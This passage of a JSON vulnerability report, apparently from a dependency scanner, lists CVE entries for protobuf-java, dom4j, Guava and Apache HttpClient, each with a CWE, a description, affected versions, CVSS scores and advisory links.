Record","url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2022-3171.yml"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CBAUKJQL6O4TIWYBENORSY5P43TVB4M3"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MPCGUT3T5L6C3IDWUPSUO22QDCGQKTOP"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3171"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3171"},{"summary":"Gentoo Advisory glsa-202301-09","url":"https://security.gentoo.org/glsa/202301-09"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"ADJACENT_NETWORK","availabilityImpact":"HIGH","baseScore":5.7,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.7,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"ADJACENT_NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.7,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2022-3171/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-22569"]}],"cve":"CVE-2021-22569","cwe":{"id":"696","name":"Incorrect Behavior Order"},"discovery_date":"2022-01-07T22:31:44","ids":[{"system_name":"CVE Record","text":"CVE-2021-22569"},{"system_name":"GitHub Advisory","text":"GHSA-wrvw-hg22-4m67"},{"system_name":"Google Advisory","text":"bulletins"},{"system_name":"Oracle Advisory","text":"cpuapr2022"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"A potential Denial of Service issue in protobuf-java"},{"category":"details","details":"Vulnerability Details","text":"# A potential Denial of Service issue in protobuf-java ## Summary  A potential Denial of Service issue in protobuf-java was discovered in the parsing procedure for binary data.  Reporter: [OSS-Fuzz](https://github.com/google/oss-fuzz)  Affected versions: All versions of Java Protobufs (including Kotlin and JRuby) prior to the versions listed below. Protobuf \"javalite\" users (typically Android) are not affected.  ## Severity  [CVE-2021-22569](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22569) **High** - CVSS Score: 7.5, An implementation weakness in how unknown fields are parsed in Java. A small (~800 KB) malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated GC pauses.  ## Proof of Concept  For reproduction details, please refer to the oss-fuzz issue that identifies the specific inputs that exercise this parsing weakness.  ## Remediation and Mitigation  Please update to the latest available versions of the following packages:  - protobuf-java (3.16.1, 3.18.2, 3.19.2)  - protobuf-kotlin (3.18.2, 3.19.2) - google-protobuf [JRuby gem only] (3.19.2)"}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/01/12/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/01/12/7"},{"summary":"Google Advisory bulletins","url":"https://cloud.google.com/support/bulletins#gcp-2022-001"},{"summary":"GitHub Advisory GHSA-wrvw-hg22-4m67","url":"https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-wrvw-hg22-4m67"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22569"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22569"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2021-22569/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10683"]}],"cve":"CVE-2020-10683","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2020-06-05T16:13:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-10683"},{"system_name":"Owasp Advisory","text":"XML_External_Entity_Prevention_Cheat_Sheet"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200518-0002"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1694235"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"dom4j allows External Entities by default which might enable XXE attacks"},{"category":"details","details":"Vulnerability Details","text":"# dom4j allows External Entities by default which might enable XXE attacks dom4j before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.  Note: This advisory applies to `dom4j:dom4j` version 1.x legacy artifacts. To resolve this a change to the latest version of `org.dom4j:dom4j` is recommended."}],"product_status":{"known_affected":["org.dom4j/dom4j@vers:maven/>=2.1.0|<2.1.3"],"known_not_affected":["org.dom4j/dom4j@2.1.3"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html"},{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1694235"},{"summary":"Owasp Advisory XML_External_Entity_Prevention_Cheat_Sheet","url":"https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3Cnotifications.freemarker.apache.org%3E"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"NetApp Advisory ntap-20200518-0002","url":"https://security.netapp.com/advisory/ntap-20200518-0002"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.dom4j/dom4j@vers:maven/>=2.1.0|<2.1.3"]}],"title":"CVE-2020-10683/pkg:maven/org.dom4j/dom4j@2.1.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-8908"]}],"cve":"CVE-2020-8908","cwe":{"id":"173","name":"Improper Handling of Alternate Encoding"},"discovery_date":"2021-03-25T17:04:19","ids":[{"system_name":"CVE Record","text":"CVE-2020-8908"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMGOOGLEGUAVA-1015415"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0003"}],"notes":[{"audience":"developers","category":"other","text":"Exposure of Sensitive Information to an Unauthorized Actor","title":"Additional CWE: 200"},{"audience":"developers","category":"other","text":"Creation of Temporary File With Insecure Permissions","title":"Additional CWE: 378"},{"audience":"developers","category":"other","text":"Incorrect Permission Assignment for Critical Resource","title":"Additional CWE: 732"},{"category":"description","details":"Vulnerability Description","text":"Information Disclosure in Guava"},{"category":"details","details":"Vulnerability Details","text":"# Information Disclosure in Guava A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.   ## Related CVE(s) CVE-2020-8908, SNYK-JAVA-COMGOOGLEGUAVA-1015415"}],"product_status":{"known_affected":["com.google.guava/guava@vers:maven/>=0.0.0|<32.0.0-android"],"known_not_affected":["com.google.guava/guava@32.0.0-android"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r007add131977f4f576c232b25e024249a3d16f66aad14a4b52819d21%40%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r007add131977f4f576c232b25e024249a3d16f66aad14a4b52819d21@%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r037fed1d0ebde50c9caf8d99815db3093c344c3f651c5a49a09824ce@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r07ed3e4417ad043a27bee7bb33322e9bfc7d7e6d1719b8e3dfd95c14%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r07ed3e4417ad043a27bee7bb33322e9bfc7d7e6d1719b8e3dfd95c14@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r161b87f8037bbaff400194a63cd2016c9a69f5949f06dcc79beeab54%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r161b87f8037bbaff400194a63cd2016c9a69f5949f06dcc79beeab54@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r215b3d50f56faeb2f9383505f3e62faa9f549bb23e8a9848b78a968e%40%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r215b3d50f56faeb2f9383505f3e62faa9f549bb23e8a9848b78a968e@%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r294be9d31c0312d2c0837087204b5d4bf49d0552890e6eec716fa6a6%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r294be9d31c0312d2c0837087204b5d4bf49d0552890e6eec716fa6a6@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2fe45d96eea8434b91592ca08109118f6308d60f6d0e21d52438cfb4%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2fe45d96eea8434b91592ca08109118f6308d60f6d0e21d52438cfb4@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748%40%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3dd8881de891598d622227e9840dd7c2ef1d08abbb49e9690c7ae1bc%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3dd8881de891598d622227e9840dd7c2ef1d08abbb49e9690c7ae1bc@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4776f62dfae4a0006658542f43034a7fc199350e35a66d4e18164ee6%40%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4776f62dfae4a0006658542f43034a7fc199350e35a66d4e18164ee6@%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27%40%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27@%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac%40%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac@%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r68d86f4b06c808204f62bcb254fcb5b0432528ee8d37a07ef4bc8222%40%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r68d86f4b06c808204f62bcb254fcb5b0432528ee8d37a07ef4bc8222@%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r79e47ed555bdb1180e528420a7a2bb898541367a29a3bc6bbf0baf2c%40%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r79e47ed555bdb1180e528420a7a2bb898541367a29a3bc6bbf0baf2c@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b0e81d8367264d6cad98766a469d64d11248eb654417809bfdacf09%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b0e81d8367264d6cad98766a469d64d11248eb654417809bfdacf09@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba%40%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7ab308481ee729f998691e8e3e02e93b1dedfc98f6b1cd3d86923b3%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7ab308481ee729f998691e8e3e02e93b1dedfc98f6b1cd3d86923b3@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2364f4cf4d274eab5a7ecfaf64bf575cedf8b0173551997c749d322%40%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2364f4cf4d274eab5a7ecfaf64bf575cedf8b0173551997c749d322@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb8c0f1b7589864396690fe42a91a71dea9412e86eec66dc85bbacaaf%40%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb8c0f1b7589864396690fe42a91a71dea9412e86eec66dc85bbacaaf@%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3%40%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a%40%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc607bc52f3507b8b9c28c6a747c3122f51ac24afe80af2a670785b97%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc607bc52f3507b8b9c28c6a747c3122f51ac24afe80af2a670785b97@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcafc3a637d82bdc9a24036b2ddcad1e519dd0e6f848fcc3d606fd78f%40%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcafc3a637d82bdc9a24036b2ddcad1e519dd0e6f848fcc3d606fd78f@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95%40%3Cgithub.arrow.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95@%3Cgithub.arrow.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd2704306ec729ccac726e50339b8a8f079515cc29ccb77713b16e7c5%40%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd2704306ec729ccac726e50339b8a8f079515cc29ccb77713b16e7c5@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604%40%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd7e12d56d49d73e2b8549694974b07561b79b05455f7f781954231bf%40%3Cdev.pig.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd7e12d56d49d73e2b8549694974b07561b79b05455f7f781954231bf@%3Cdev.pig.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re120f6b3d2f8222121080342c5801fdafca2f5188ceeb3b49c8a1d27%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re120f6b3d2f8222121080342c5801fdafca2f5188ceeb3b49c8a1d27@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reebbd63c25bc1a946caa419cec2be78079f8449d1af48e52d47c9e85%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reebbd63c25bc1a946caa419cec2be78079f8449d1af48e52d47c9e85@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf00b688ffa620c990597f829ff85fdbba8bf73ee7bfb34783e1f0d4e%40%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf00b688ffa620c990597f829ff85fdbba8bf73ee7bfb34783e1f0d4e@%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf9f0fa84b8ae1a285f0210bafec6de2a9eba083007d04640b82aa625%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf9f0fa84b8ae1a285f0210bafec6de2a9eba083007d04640b82aa625@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc27e2727a20a574f39273e0432aa97486a332f9b3068f6ac1346594%40%3Cdev.myfaces.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc27e2727a20a574f39273e0432aa97486a332f9b3068f6ac1346594@%3Cdev.myfaces.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8908"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8908"},{"summary":"NetApp Advisory ntap-20220210-0003","url":"https://security.netapp.com/advisory/ntap-20220210-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMGOOGLEGUAVA-1015415","url":"https://snyk.io/vuln/SNYK-JAVA-COMGOOGLEGUAVA-1015415"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":3.3,"baseSeverity":"LOW","confidentialityImpact":"LOW","environmentalScore":3.3,"environmentalSeverity":"LOW","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":3.3,"temporalSeverity":"LOW","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["com.google.guava/guava@vers:maven/>=0.0.0|<32.0.0-android"]}],"title":"CVE-2020-8908/pkg:maven/com.google.guava/guava@23.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-2976"]}],"cve":"CVE-2023-2976","cwe":{"id":"379","name":"Creation of Temporary File in Directory with Insecure Permissions"},"discovery_date":"2023-06-14T18:30:38","ids":[{"system_name":"CVE Record","text":"CVE-2023-2976"},{"system_name":"Intel Advisory","text":"intel-sa-01006"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0008"}],"notes":[{"audience":"developers","category":"other","text":"Files or Directories Accessible to External Parties","title":"Additional CWE: 552"},{"category":"description","details":"Vulnerability Description","text":"Guava vulnerable to insecure use of temporary directory"},{"category":"details","details":"Vulnerability Details","text":"# Guava vulnerable to insecure use of temporary directory Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to be able to access the files created by the class.  Even though the security vulnerability is fixed in version 32.0.0, maintainers recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows."}],"product_status":{"known_affected":["com.google.guava/guava@vers:maven/>=1.0|<32.0.0-android"],"known_not_affected":["com.google.guava/guava@32.0.0-android"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-2976"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-2976"},{"summary":"NetApp Advisory ntap-20230818-0008","url":"https://security.netapp.com/advisory/ntap-20230818-0008"},{"summary":"Intel Advisory intel-sa-01006","url":"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01006.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["com.google.guava/guava@vers:maven/>=1.0|<32.0.0-android"]}],"title":"CVE-2023-2976/pkg:maven/com.google.guava/guava@23.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-13956"]}],"cve":"CVE-2020-13956","cwe":{"id":"79","name":"Improper Neutralization of Input During Web Page Generation"},"discovery_date":"2021-06-03T23:40:23","ids":[{"system_name":"CVE Record","text":"CVE-2020-13956"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Cross-site scripting in Apache HttpClient"},{"category":"details","details":"Vulnerability Details","text":"# Cross-site scripting in Apache HttpClient Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request 